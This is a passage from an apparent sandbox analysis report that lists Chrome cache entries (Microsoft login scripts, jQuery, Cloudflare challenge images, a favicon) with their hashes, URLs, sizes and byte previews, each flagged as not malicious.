                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                Chrome Cache Entry: 128

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                Category:downloaded
                                                                Size (bytes):116365
                                                                Entropy (8bit):7.997737813291819
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:2D3FBED6DDD719FCC1BFB500B612FCEC
                                                                SHA1:CD91B795DDE806AC8A38E51CCB6E8BAD8E57DA1B
                                                                SHA-256:B2566B646F02DF4CE30B05D8223B78130A719D4EC9E4794A0106C371ADE33CC7
                                                                SHA-512:A870E514B325D6FDC4D154438A8DD333C7AB46E545C1B27AC4869D9F1D8594CA1CDC530F5E96C835220DDAD4E1CEF841673696978031B5237E783972AEE701D1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js
                                                                Preview:...........k[.H.(.}..[..-..c.0DFxHBz.I......O.a...#yt......k...J..&...........^.~...._..j...W;.8<.....]....m...~.}<.8~s.~=.(....qm.Oy.~....jaP......h.F^......|oZ.G.M-...,...a..~..GW|...L....N.(y...Z-..Cm......p.......?.5/.QmS..b^K...jw..8.}..Q.....!.o..8...&X.x-.Im.F.D..U;.....-.T.:...1........8Ka..M.L.ZZ'....>........x....v.S;.<...0J.I.0.G.....B.F..c.k.~....C.:...r..,.w.q~....q......#42V.q..f|.kK...1o.mP.}.......N..n.w6.%^M.d.;...~2I.Z..fs...S/......F..=?...5....s..N.+.A.mx...j.T......?..W._p6.|.}|.{O.....2..`..._......g....j..xb^^...a.y.....s......4....q.Y..^T....X,.....m..~v,.....WP.U...:O".YoRX...7..S...zI.v.......mq.....E.,z.%....L|.>.M.'i..ki3.u+.~...x.=...?6.%?.[.G.`Z=.$.w..4.."...R.1.k.|..N.`......3...7.].'.E..).az......<a....4q..6.(..=~..........frk..?M#^Q.z..A..M.f.......S....s..d.e91._,zO.[X.......4.G..!.9Vg.......j.-?~.z.w..f.M............,...Z....w5..#.^..M.P.'.X.n/..mW.|......0...w../...>\...l.......h...q>.w...FC[....7.

                                                                Chrome Cache Entry: 132

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57443
                                                                Category:dropped
                                                                Size (bytes):16326
                                                                Entropy (8bit):7.987374325584103
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C217AE35B8592DC9F1E680487DAD094F
                                                                SHA1:2E642562C2BFD8968629317FF212684C7EB59193
                                                                SHA-256:D41992E79D7BCFCC1F32597208DD99033D99C04882EAFCC8508F2FA0EE728C6B
                                                                SHA-512:EAF3BF49BCF58A7F7C39CBF35FD75862FEE98F611536080DFC794D288274CB9D67E95D0299679F7981E110B2577A47579D3623C7F11A6AC2A0CFA56AAEA2CAB0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...........}Ms#.......\.@..'F.........C)$....`.......Q.x7...}..'.}..?e#...QU]....Vo.................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.>............4....F,&c.)n.[.pcQp...4...6...i.............CkL=....'.\..L......2.A..o.u..."*p.. Xx.......'l.[w..'c/^.FP.....q.h4.R+X.x...d..M.}.Z,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j.7.....?.)..t.z.-..m.]..3y...3@.3YO.KSz]...4.b........V..+.%.[.&........l.H>G.^<..{.$"..-.i.........`qcw...`.[....as[.+.X...n..X..%,:......am."a....^o@@.`].....( (b...k..B.0.....AX.D.?...,..-<@k.;..(*..C.]...:.nn..8..s...."4.. ...J...P.n....F.3G..u..;9&.{.2.80.XB.....@.qw.:../.`.P?.+t..w6.a~..7...8k..U._......k,..o.....yQ..r.....}.E...B.r......?{...\fB....-.).Fb.;.p.N?(..P.?..p....F........)p..,`l...o@.;.x.....:..f.E....<0..#K\...K(?K/OX

                                                                Chrome Cache Entry: 134

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 449972
                                                                Category:dropped
                                                                Size (bytes):122342
                                                                Entropy (8bit):7.997532685332134
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:147E69329BBA6FCE4DDE9F78ED77B09C
                                                                SHA1:562AAB06119DA1887889091BD4ED50EA28BCA5B6
                                                                SHA-256:EC4EF3667A279D376892CD32D3E03852EAA04633FD1B2191E74F6312DA2C1D4A
                                                                SHA-512:CFBD3615F3581F4754E10EA4636423924187E4AD26F02EA613FED5C616A7118FE62D490CDE224E5AF4FAB5D54DC13C6DEEA82FA938F3DAA1EE0229C2D4705358
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...........{w.8.8.....fn..(...J.....v.g.wS..Y..ud.+.y....?.$%.SU.{.=..yT,.|. .. ......si...S.]...K.......%|.G.bx}..|.=.(.....K..g%.;.c...F%/p.h.Fv......<./M.pVJ.Xi...2'.K..'Ph...T..".tiG.k...R.....M..J;...~?$. L<......|..bVZ...J....P:..(..IR...'h$^@z...dG....4.....Z.!..5.fx.1.C.<.*..@._...b....4......t".....C).K..B.>...LK..YL.`zV.t.]8I57.EO.E./.....Y1...^......id..r..L.=.... ..y..._K.l.....%.'.|.|.[...YU.A..g....q.\....Zk.fTx.C..c....<,.U'.}p...c....s?..hx..g...q\.....zP:.g....U...).?..K..X..>..........d.8.2.,..RP..+..O6 _....nkwz...;=.j.c.....U.....0..xVx....1..*.~.&.sV}...s.(.3 ...s_.u...k.zw..Nu.......Tt.a......n).|W...@.ev..Y..S....]..s..V.j..M.r.\Y..Z.n[.z...S4...oR.n..J.E...w....b|H.-L.....c.".\.V....B..D...=..V..vjY..D.B......rb...~U2b\.....:.0.M~k;....Z_..!......5......m....k.N..&.+...Ri...T\.8`{.3.B...DL}4].:.u........`?....W`Z".S.S..<= ....Z...n."..*}..K.{8)..._..A%..L...I)UX...)y..P.V.....G.....z{K?.,............@Z..2.(..%'<B..

                                                                Chrome Cache Entry: 141

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                Category:downloaded
                                                                Size (bytes):35168
                                                                Entropy (8bit):7.99275807202193
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:D3B6AE9986DF244AB03412CC700335D0
                                                                SHA1:BAAA1F9899178938F3881F09B18265E47DA806E3
                                                                SHA-256:CA50059111D30C2E212C90805792EB543548AEF0D4941E886A778E3DCE0B9066
                                                                SHA-512:755C57FBC9BECE435A477F76C5E8198CA8942C23BE667ACAB83A00E5CD4F54075B10AA07C7FDC10C38FC3D5C0C406C9132FEB5B67BA5BCCC57EF796054A84E7C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js
                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........:..z.>.y..u.....N...^..S.......z~@..;...n...K........x..A]....F.8X&Em..P.s.....a.g.|.d......._..C`.xQ...\..'...QP....?.R.{?....|.>........E4.GRz...z.k.z.}....h..>.{[E.:.....Pu. ..e6_.o.p*.w...>...:...o.k~...~..&E._..}}.}%[. ..#......z.5M.b.....z..k.H.4...l..D.o...z..M.+../..`....?y.J4.=....u.....Z.....E.d.....{0H^...8.....9..h......d..6j......../..z..V<.`.F.xm.y..yt.J....

                                                                Chrome Cache Entry: 145

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 92 x 67, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.9902101553250042
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0ED14AF36F2244A2F02C53D5EA300686
                                                                SHA1:01E2ECB913536B9325C3A8FE6AD26B954D14753C
                                                                SHA-256:69E572F8A1712ECE5B8BE0A95E10F808BCBA4AC9CA31A553A820AD948604443C
                                                                SHA-512:A31CF0251391FA320889C83408F15C2B63EA4A5B878F85CA3EF591FFB3E7F52E128AE1EBE253B3C8CE6B7A5F1F104CBC35DF1757306BF07A78A0295D6F3631E6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e31e5c8d84a3468/1731701564320/DHJ-Ff0u-GtLTiF
                                                                Preview:.PNG........IHDR...\...C........A....IDAT.....$.....IEND.B`.

                                                                Chrome Cache Entry: 146

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 97 x 56, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.035372245524405
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:57C8353D95A7610C40A982ABB97F1DDC
                                                                SHA1:FFC36C413360259ACA19205D3B8531B904E22955
                                                                SHA-256:9A434FD42FF7932B35D5392ABBE946059956EEF622968BB727719279D82D857E
                                                                SHA-512:8614E6D1F8F044AC8CDACE2BD05D22EC1AB6551AE75C00AEB68272038CA9DC8DF0B8E9E84714A1480B6A9CFC18F0A37A436A112E4D844C03E3F34AF272C01FC7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...a...8.....b.......IDAT.....$.....IEND.B`.

                                                                Chrome Cache Entry: 147

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                Category:downloaded
                                                                Size (bytes):17174
                                                                Entropy (8bit):2.9129715116732746
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/favicon.ico?v2
                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                Chrome Cache Entry: 148

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):201253
                                                                Entropy (8bit):2.661810841903416
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:85DE642E1467807F64F7E10807DF3869
                                                                SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
                                                                Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="

                                                                Chrome Cache Entry: 150

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):36
                                                                Entropy (8bit):4.503258334775644
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:06B313E93DD76909460FBFC0CD98CB6B
                                                                SHA1:C4F9B2BBD840A4328F85F54873C434336A193888
                                                                SHA-256:B4532478707B495D0BB1C21C314AEF959DD1A5E0F66E52DAD5FC332C8B697CBA
                                                                SHA-512:EFD7E8195D9C126883C71FED3EFEDE55916848B784F8434ED2677DF5004436F7EDE9F80277CB4675C4DEB8F243B2705A3806B412FAA8842E039E9DC467C11645
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                Preview:ChgKDQ3RW1FSGgQIVhgCIAEKBw1Xevf9GgA=

                                                                Chrome Cache Entry: 151

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                Category:downloaded
                                                                Size (bytes):5529
                                                                Entropy (8bit):7.95514518328613
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6DEB44A9FE273266EFABC3214B998BA0
                                                                SHA1:C8BE755694C25E416C81F5057670E3B14B2FE08F
                                                                SHA-256:4A1AA3B8B23FB3C150A62BB681DAE96E6CAB20BFAFB89D74FED2E0BC85826BAF
                                                                SHA-512:EBA11F91C3751574F82FBF82F81338761142ABC13B14534133A2986BEF2F2505125B648E1E991F79C1ACC731A9008F98C3F7937649533E7C4E59C2548D4E7452
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js
                                                                Preview:...........[}w.F...?.b.(..c.i....8zI..k..f...$F.1.. ........$!..=.13w..s./>.w........u{g.=...u.....>h./{.F..xhS..7.6....9p...(.D..a..Q.\hS.L|7.FI4.....$....._.X4.At..@.x...s.seZ.....!V..x..'..F.?..z.[..Ppm.z<..'.p.]..$..(..>...6.3..o.47..6..t...AfX..F.($8...= ...'..GDb<.iM..s.D....N..F.<.e.......M....t ...Sk.'wDb.h...M2K...... ..6N.X.o..s...S.....r.`......1..4.c...J....V....ED.7.........p......&i....p....F.C/...W...-.....|..E...W.v5.....M]?...*s.........~....!........R.....~.A... v....C.S1.X|.lZ.LL...._.f....h.f.ep.2a>..,G..,...d..G&....dn.....j$..uB.z...Y..x2.......rI. ...?...w<.y.b.vF..h...b..l......\....cq.S.u......'&...E..s.d..-).I.M]..0.;.....;~6K'....$.G....;.8..<_.;.O.]...;.}..[.cWDJ6z..l..H..'8~..6vj5........Q...I..X.Ww..vB.....{v..$...].......d..kAO#.G...0(.....Y..G.6k.%z.S..6....Qw...`H....)1.5.......M...}C..z...2...d.;5..(.!.....}.Y.!..0..n.a.`..'D..@../.N.|w.OcH.];Z...k.....1g.4.f..t.'...........8i..<!...6M...p...

                                                                Chrome Cache Entry: 153

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):15
                                                                Entropy (8bit):3.189898095464287
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:39A19D0882684989864FA50BCED6A2D1
                                                                SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                Preview:/* empty css */

                                                                Chrome Cache Entry: 154

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                Category:dropped
                                                                Size (bytes):621
                                                                Entropy (8bit):7.673946009263606
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...

                                                                Chrome Cache Entry: 155

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (32089)
                                                                Category:dropped
                                                                Size (bytes):92629
                                                                Entropy (8bit):5.303443527492463
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)

                                                                Chrome Cache Entry: 158

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113378
                                                                Category:downloaded
                                                                Size (bytes):20400
                                                                Entropy (8bit):7.980289584022803
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F0DE9A98DBDFA8C02742CE6D92FB2524
                                                                SHA1:CDEC682AEB9E39EDCCC2374DAB26F04DB754A8B5
                                                                SHA-256:FAF4294F27A542B0F9EA2A7CB2711529AB027CD84A5F5BADFAE752100855E6BE
                                                                SHA-512:856FC9AB199997E69A9487372BC0083564F7115B3E0678CF1D542B9864E9A88D5FFB85697FD93538DC9439071E3BCD4B8BCCBFC610E1A45DE104D6362D8ADCD9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.

                                                                Chrome Cache Entry: 164

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (41651)
                                                                Category:downloaded
                                                                Size (bytes):131537
                                                                Entropy (8bit):5.2237799798561975
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

                                                                Chrome Cache Entry: 165

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                                                                Chrome Cache Entry: 166

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 79 x 78, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.9778349503715043
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:228B63099E198B831BF889D6ACF4D50E
                                                                SHA1:6930398EE84FBE62908E7E5F6F2A4DE121A1372B
